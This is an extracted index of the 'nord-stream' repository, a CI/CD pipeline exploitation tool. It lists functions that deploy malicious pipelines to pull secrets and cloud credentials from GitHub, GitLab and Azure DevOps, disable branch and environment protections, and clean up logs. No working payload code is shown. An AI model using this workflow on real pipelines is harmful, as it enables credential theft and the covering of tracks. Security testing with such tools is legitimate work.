method __runOIDCTokenGenerationWorfklow (line 534) | def __runOIDCTokenGenerationWorfklow(self, repo):
method __runSecretsExtractionWorkflow (line 553) | def __runSecretsExtractionWorkflow(self, repo):
method __deleteRemoteBranch (line 560) | def __deleteRemoteBranch(self):
method __clean (line 571) | def __clean(self, repo, cleanRemoteLogs=True):
method start (line 596) | def start(self):
method __dispatchWorkflow (line 644) | def __dispatchWorkflow(self, repo):
method __checkAllEnvSecurity (line 652) | def __checkAllEnvSecurity(self, repo):
method __checkSingleEnvSecurity (line 662) | def __checkSingleEnvSecurity(self, repo, env):
method checkBranchProtections (line 666) | def checkBranchProtections(self):
method _checkBranchProtectionRules (line 705) | def _checkBranchProtectionRules(self, repo):
method __checkAndDisableBranchProtectionRules (line 732) | def __checkAndDisableBranchProtectionRules(self, repo):
method __checkAndGetBranchProtectionRules (line 766) | def __checkAndGetBranchProtectionRules(self, repo):
method __isEnvProtectionsEnabled (line 781) | def __isEnvProtectionsEnabled(self, repo, env):
method __disableEnvProtections (line 795) | def __disableEnvProtections(self, repo, envDetails):
method __restoreEnvProtections (line 826) | def __restoreEnvProtections(self, repo, env, policyId, waitTime, revie...
method describeToken (line 832) | def describeToken(self):
method __resetBranchProtectionRules (line 880) | def __resetBranchProtectionRules(self, repo, protections):
FILE: nordstream/core/github/protections.py
function resetRequiredStatusCheck (line 4) | def resetRequiredStatusCheck(protections):
function resetRequiredPullRequestReviews (line 22) | def resetRequiredPullRequestReviews(protections):
function resetRestrictions (line 71) | def resetRestrictions(protections):
function getUsersArray (line 87) | def getUsersArray(users):
function getTeamsOrAppsArray (line 94) | def getTeamsOrAppsArray(data):
FILE: nordstream/core/gitlab/gitlab.py
class GitLabRunner (line 15) | class GitLabRunner:
method writeAccessFilter (line 29) | def writeAccessFilter(self):
method writeAccessFilter (line 33) | def writeAccessFilter(self, value):
method extractProject (line 37) | def extractProject(self):
method extractProject (line 41) | def extractProject(self, value):
method extractGroup (line 45) | def extractGroup(self):
method extractGroup (line 49) | def extractGroup(self, value):
method extractInstance (line 53) | def extractInstance(self):
method extractInstance (line 57) | def extractInstance(self, value):
method yaml (line 61) | def yaml(self):
method yaml (line 65) | def yaml(self, value):
method branchAlreadyExists (line 69) | def branchAlreadyExists(self):
method branchAlreadyExists (line 73) | def branchAlreadyExists(self, value):
method cleanLogs (line 77) | def cleanLogs(self):
method cleanLogs (line 81) | def cleanLogs(self, value):
method sleepTime (line 85) | def sleepTime(self):
method sleepTime (line 89) | def sleepTime(self, value):
method localPath (line 93) | def localPath(self):
method localPath (line 97) | def localPath(self, value):
method __init__ (line 103) | def __init__(self, cicd):
method __createLogDir (line 107) | def __createLogDir(self):
method getProjects (line 111) | def getProjects(self, project, strict=False, membership=False):
method getGroups (line 136) | def getGroups(self, group):
method listGitLabRunners (line 154) | def listGitLabRunners(self):
method __mergeLists (line 164) | def __mergeLists(self, current, new, key):
method __mergeRunners (line 168) | def __mergeRunners(self, current, new):
method __listGitLabProjectRunners (line 181) | def __listGitLabProjectRunners(self):
method listGitLabSecrets (line 204) | def listGitLabSecrets(self):
method __listGitLabProjectSecrets (line 223) | def __listGitLabProjectSecrets(self):
method __listGitLabProjectSecureFiles (line 233) | def __listGitLabProjectSecureFiles(self):
method __listGitLabGroupSecrets (line 243) | def __listGitLabGroupSecrets(self):
method __listGitLabInstanceSecrets (line 253) | def __listGitLabInstanceSecrets(self):
method __displayProjectVariables (line 260) | def __displayProjectVariables(self, project):
method __displayProjectSecureFiles (line 295) | def __displayProjectSecureFiles(self, project):
method __displayGroupVariables (line 314) | def __displayGroupVariables(self, group):
method __displayInstanceVariables (line 335) | def __displayInstanceVariables(self):
method listGitLabProjects (line 352) | def listGitLabProjects(self):
method listGitLabUsers (line 365) | def listGitLabUsers(self):
method listGitLabGroups (line 382) | def listGitLabGroups(self):
method runPipeline (line 387) | def runPipeline(self):
method __runCustomPipeline (line 441) | def __runCustomPipeline(self, project):
method __launchPipeline (line 460) | def __launchPipeline(self, project, pipelineGenerator):
method __extractPipelineOutput (line 500) | def __extractPipelineOutput(self, project, resultsFilename="secrets.tx...
method __clean (line 514) | def __clean(self, project):
method manualCleanLogs (line 532) | def manualCleanLogs(self):
method __deleteRemoteBranch (line 538) | def __deleteRemoteBranch(self):
method describeToken (line 549) | def describeToken(self):
method listBranchesProtectionRules (line 575) | def listBranchesProtectionRules(self):
method __displayBranchesProtectionRulesPriv (line 597) | def __displayBranchesProtectionRulesPriv(self, protections):
method __displayBranchesProtectionRulesUnpriv (line 625) | def __displayBranchesProtectionRulesUnpriv(self, branches):
method __displayAccessLevel (line 643) | def __displayAccessLevel(self, access_levels):
method __displayFailureReasons (line 661) | def __displayFailureReasons(self, projectId, pipelineId):
FILE: nordstream/git.py
class Git (line 11) | class Git:
method gitRunCommand (line 20) | def gitRunCommand(command):
method gitInitialization (line 33) | def gitInitialization(cls, branch, branchAlreadyExists=False):
method gitCleanRemote (line 52) | def gitCleanRemote(cls, branch, leaveOneFile=False):
method gitRemoteBranchExists (line 70) | def gitRemoteBranchExists(cls, branch):
method gitUndoLastPushedCommits (line 75) | def gitUndoLastPushedCommits(cls, branch, pushedCommitsCount):
method gitDeleteRemote (line 92) | def gitDeleteRemote(branch):
method gitPush (line 102) | def gitPush(cls, branch):
method gitCreateDummyFile (line 114) | def gitCreateDummyFile(cls, file):
method gitDiffFile (line 118) | def gitDiffFile(cls, file):
method gitMvFile (line 127) | def gitMvFile(cls, src, dest):
method gitCpFile (line 131) | def gitCpFile(cls, src, dest):
method gitCreateDir (line 135) | def gitCreateDir(cls, directory):
method gitClone (line 139) | def gitClone(url):
method gitGetCurrentBranch (line 156) | def gitGetCurrentBranch():
method gitIsGloalUserConfigured (line 169) | def gitIsGloalUserConfigured():
method gitIsGloalEmailConfigured (line 184) | def gitIsGloalEmailConfigured():
FILE: nordstream/utils/devops.py
function listOrgs (line 5) | def listOrgs(token):
FILE: nordstream/utils/errors.py
class DevOpsError (line 1) | class DevOpsError(Exception):
class GitHubError (line 5) | class GitHubError(Exception):
class GitHubBadCredentials (line 9) | class GitHubBadCredentials(Exception):
class GitLabError (line 13) | class GitLabError(Exception):
class GitError (line 17) | class GitError(Exception):
class GitPushError (line 21) | class GitPushError(GitError):
class RepoCreationError (line 25) | class RepoCreationError(Exception):
FILE: nordstream/utils/helpers.py
function isHexadecimal (line 3) | def isHexadecimal(s):
function isGitLabSessionCookie (line 8) | def isGitLabSessionCookie(s):
function isAZDOBearerToken (line 12) | def isAZDOBearerToken(s):
function randomString (line 16) | def randomString(length):
function isAllowed (line 21) | def isAllowed(value, sclist, allow=True):
FILE: nordstream/utils/log.py
class WhitespaceStrippingConsole (line 15) | class WhitespaceStrippingConsole(Console):
method _render_buffer (line 16) | def _render_buffer(self, *args, **kwargs):
class NordStreamLog (line 22) | class NordStreamLog(logging.Logger):
method setVerbosity (line 28) | def setVerbosity(verbose: int, quiet: bool = False):
method debug (line 40) | def debug(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method verbose (line 44) | def verbose(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method raw (line 49) | def raw(
method info (line 69) | def info(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method warning (line 73) | def warning(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method error (line 79) | def error(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method exception (line 83) | def exception(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method critical (line 87) | def critical(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method success (line 93) | def success(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method empty_line (line 98) | def empty_line(self, log_level: int = logging.INFO) -> None:
FILE: nordstream/yaml/custom.py
class CustomGenerator (line 6) | class CustomGenerator(YamlGeneratorBase):
method loadFile (line 7) | def loadFile(self, file):
method writeFile (line 17) | def writeFile(self, file):
method displayYaml (line 26) | def displayYaml(self):
FILE: nordstream/yaml/devops.py
class DevOpsPipelineGenerator (line 4) | class DevOpsPipelineGenerator(YamlGeneratorBase):
method _get_base_template (line 7) | def _get_base_template(self, poolName, os_type):
method _get_ps_b64_script (line 17) | def _get_ps_b64_script(self, fetch_logic):
method generatePipelineForSecretExtraction (line 28) | def generatePipelineForSecretExtraction(self, variableGroup, poolName=...
method generatePipelineForSecureFileExtraction (line 69) | def generatePipelineForSecureFileExtraction(self, secureFile, poolName...
method generatePipelineForAzureRm (line 93) | def generatePipelineForAzureRm(self, azureSubscription, poolName=None,...
method generatePipelineForGitHub (line 118) | def generatePipelineForGitHub(self, endpoint, poolName=None, os="linux"):
method generatePipelineForAWS (line 150) | def generatePipelineForAWS(self, awsCredentials, poolName=None, os="li...
method generatePipelineForSonar (line 176) | def generatePipelineForSonar(self, sonarSCName, poolName=None, os="lin...
method generatePipelineForSSH (line 204) | def generatePipelineForSSH(self, sshSCName, poolName=None, os="linux"):
FILE: nordstream/yaml/generator.py
class YamlGeneratorBase (line 6) | class YamlGeneratorBase:
method defaultTemplate (line 10) | def defaultTemplate(self):
method defaultTemplate (line 14) | def defaultTemplate(self, value):
method getEnvironnmentFromYaml (line 19) | def getEnvironnmentFromYaml(yamlFile):
method loadFile (line 29) | def loadFile(self, file):
method writeFile (line 39) | def writeFile(self, file):
method displayYaml (line 48) | def displayYaml(self):
FILE: nordstream/yaml/github.py
class WorkflowGenerator (line 5) | class WorkflowGenerator(YamlGeneratorBase):
method generateWorkflowForSecretsExtraction (line 69) | def generateWorkflowForSecretsExtraction(self, secrets, env=None):
method generateWorkflowForOIDCAzureTokenGeneration (line 74) | def generateWorkflowForOIDCAzureTokenGeneration(self, tenant, subscrip...
method generateWorkflowForOIDCAWSTokenGeneration (line 81) | def generateWorkflowForOIDCAWSTokenGeneration(self, role, region, env=...
method addEnvToYaml (line 88) | def addEnvToYaml(self, env):
method getEnv (line 94) | def getEnv(self):
method addSecretsToYaml (line 100) | def addSecretsToYaml(self, secrets):
method addAzureInfoForOIDCToYaml (line 107) | def addAzureInfoForOIDCToYaml(self, tenant, subscription, client):
method addAWSInfoForOIDCToYaml (line 114) | def addAWSInfoForOIDCToYaml(self, role, region):
FILE: nordstream/yaml/gitlab.py
class GitLabPipelineGenerator (line 4) | class GitLabPipelineGenerator(YamlGeneratorBase):
Condensed preview — 32 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (304K chars).
[
{
"path": ".github/ISSUE_TEMPLATE/bug_report.md",
"chars": 590,
"preview": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: \"[BUG]\"\nlabels: bug\nassignees: hugo-syn\n\n---\n\n**De"
},
{
"path": ".github/ISSUE_TEMPLATE/feature_request.md",
"chars": 580,
"preview": "---\nname: Feature request\nabout: Suggest an idea for this project\ntitle: \"[FEAT]\"\nlabels: enhancement\nassignees: hugo-sy"
},
{
"path": ".gitignore",
"chars": 125,
"preview": "# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\nbuild/\n\n#custom\nnord-stream-logs/\nnotes.md\n.vs"
},
{
"path": ".pre-commit-config.yaml",
"chars": 907,
"preview": "repos:\n - repo: https://github.com/pre-commit/pre-commit-hooks\n rev: v6.0.0\n hooks:\n - id: check-added-large"
},
{
"path": "CONTRIBUTING.md",
"chars": 411,
"preview": "# Contributing rules\n\n- Install [`pre-commit`](https://pre-commit.com/).\n- Enable `pre-commit` hooks in the repository f"
},
{
"path": "LICENSE",
"chars": 35149,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "README.md",
"chars": 29506,
"preview": "# Nord Stream\n\nNord Stream is a tool that allows you extract secrets stored inside CI/CD environments by deploying _mali"
},
{
"path": "nordstream/__main__.py",
"chars": 1169,
"preview": "#!/usr/bin/env python3\n\"\"\"\nCICD pipeline exploitation tool\n\nUsage:\n nord-stream <command> [<args>...]\n\nCommands\n g"
},
{
"path": "nordstream/cicd/devops.py",
"chars": 23514,
"preview": "import requests\nimport time\nfrom os import makedirs\nfrom nordstream.utils.log import logger\nfrom nordstream.yaml.devops "
},
{
"path": "nordstream/cicd/github.py",
"chars": 21404,
"preview": "import requests\nimport time\nfrom os import makedirs\nimport urllib.parse\nfrom nordstream.utils.errors import GitHubError,"
},
{
"path": "nordstream/cicd/gitlab.py",
"chars": 23038,
"preview": "import requests\nimport time\nimport re\nimport sys\nfrom os import makedirs\nfrom nordstream.utils.log import logger\nfrom no"
},
{
"path": "nordstream/commands/devops.py",
"chars": 7409,
"preview": "\"\"\"\nCICD pipeline exploitation tool\n\nUsage:\n nord-stream devops [options] --token <pat> --org <org> [extraction] [--p"
},
{
"path": "nordstream/commands/github.py",
"chars": 8487,
"preview": "\"\"\"\nCICD pipeline exploitation tool\n\nUsage:\n nord-stream github [options] --token <ghp> --org <org> [--repo <repo> --"
},
{
"path": "nordstream/commands/gitlab.py",
"chars": 6865,
"preview": "\"\"\"\nCICD pipeline exploitation tool\n\nUsage:\n nord-stream gitlab [options] --token <pat> (--list-secrets | --list-prot"
},
{
"path": "nordstream/core/devops/devops.py",
"chars": 31604,
"preview": "import base64\nimport logging\nimport subprocess\nimport time\nfrom os import chdir, makedirs\nfrom os.path import exists, re"
},
{
"path": "nordstream/core/github/display.py",
"chars": 7468,
"preview": "from nordstream.utils.log import logger\nimport logging\nfrom nordstream.core.github.protections import getUsersArray, get"
},
{
"path": "nordstream/core/github/github.py",
"chars": 32139,
"preview": "import logging\nimport base64\nimport glob\nfrom zipfile import ZipFile\nfrom os import makedirs, chdir\nfrom os.path import "
},
{
"path": "nordstream/core/github/protections.py",
"chars": 3437,
"preview": "from collections import defaultdict\n\n\ndef resetRequiredStatusCheck(protections):\n\n res = defaultdict(dict)\n requir"
},
{
"path": "nordstream/core/gitlab/gitlab.py",
"chars": 24096,
"preview": "import logging\n\nfrom urllib.parse import urlparse\nfrom os import makedirs, chdir\nfrom os.path import exists, realpath\nfr"
},
{
"path": "nordstream/git.py",
"chars": 5966,
"preview": "import subprocess\nfrom nordstream.utils.log import logger\nfrom nordstream.utils.constants import *\nfrom nordstream.utils"
},
{
"path": "nordstream/utils/constants.py",
"chars": 676,
"preview": "# All constants\nOUTPUT_DIR = \"nord-stream-logs\"\nDEFAULT_BRANCH_NAME = \"dev_remote_ea5Eu/test/v1\"\nUSER_AGENT = (\n \"Moz"
},
{
"path": "nordstream/utils/devops.py",
"chars": 354,
"preview": "import logging\nfrom nordstream.cicd.devops import DevOps\nfrom nordstream.utils.log import logger\n\ndef listOrgs(token):\n "
},
{
"path": "nordstream/utils/errors.py",
"chars": 297,
"preview": "class DevOpsError(Exception):\n pass\n\n\nclass GitHubError(Exception):\n pass\n\n\nclass GitHubBadCredentials(Exception):"
},
{
"path": "nordstream/utils/helpers.py",
"chars": 574,
"preview": "import random, string\n\ndef isHexadecimal(s):\n hex_digits = set(\"0123456789abcdefABCDEF\")\n return all(c in hex_digi"
},
{
"path": "nordstream/utils/log.py",
"chars": 5071,
"preview": "\"\"\"\ncustom logging module.\n\"\"\"\n\nimport logging\nimport os\nfrom typing import Any, cast\n\nfrom rich.console import Console\n"
},
{
"path": "nordstream/yaml/custom.py",
"chars": 899,
"preview": "import logging\nfrom nordstream.utils.log import logger\nfrom nordstream.yaml.generator import YamlGeneratorBase\n\n\nclass C"
},
{
"path": "nordstream/yaml/devops.py",
"chars": 11210,
"preview": "from nordstream.yaml.generator import YamlGeneratorBase\nfrom nordstream.utils.constants import DEFAULT_TASK_NAME\n\nclass "
},
{
"path": "nordstream/yaml/generator.py",
"chars": 1573,
"preview": "import yaml\nimport logging\nfrom nordstream.utils.log import logger\n\n\nclass YamlGeneratorBase:\n _defaultTemplate = \"\"\n"
},
{
"path": "nordstream/yaml/github.py",
"chars": 4414,
"preview": "from nordstream.utils.log import logger\nfrom nordstream.yaml.generator import YamlGeneratorBase\n\n\nclass WorkflowGenerato"
},
{
"path": "nordstream/yaml/gitlab.py",
"chars": 134,
"preview": "from nordstream.yaml.generator import YamlGeneratorBase\n\n\nclass GitLabPipelineGenerator(YamlGeneratorBase):\n _default"
},
{
"path": "pyproject.toml",
"chars": 383,
"preview": "[build-system]\nrequires = [\"setuptools\", \"wheel\"]\nbuild-backend = \"setuptools.build_meta\"\n\n[project]\nname = \"nord-stream"
},
{
"path": "requirements.txt",
"chars": 28,
"preview": "docopt\nPyYAML\nrequests\nrich\n"
}
]
About this extraction
This page contains the full source code of the synacktiv/nord-stream GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 32 files (282.7 KB), approximately 64.5k tokens, and a symbol index with 422 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.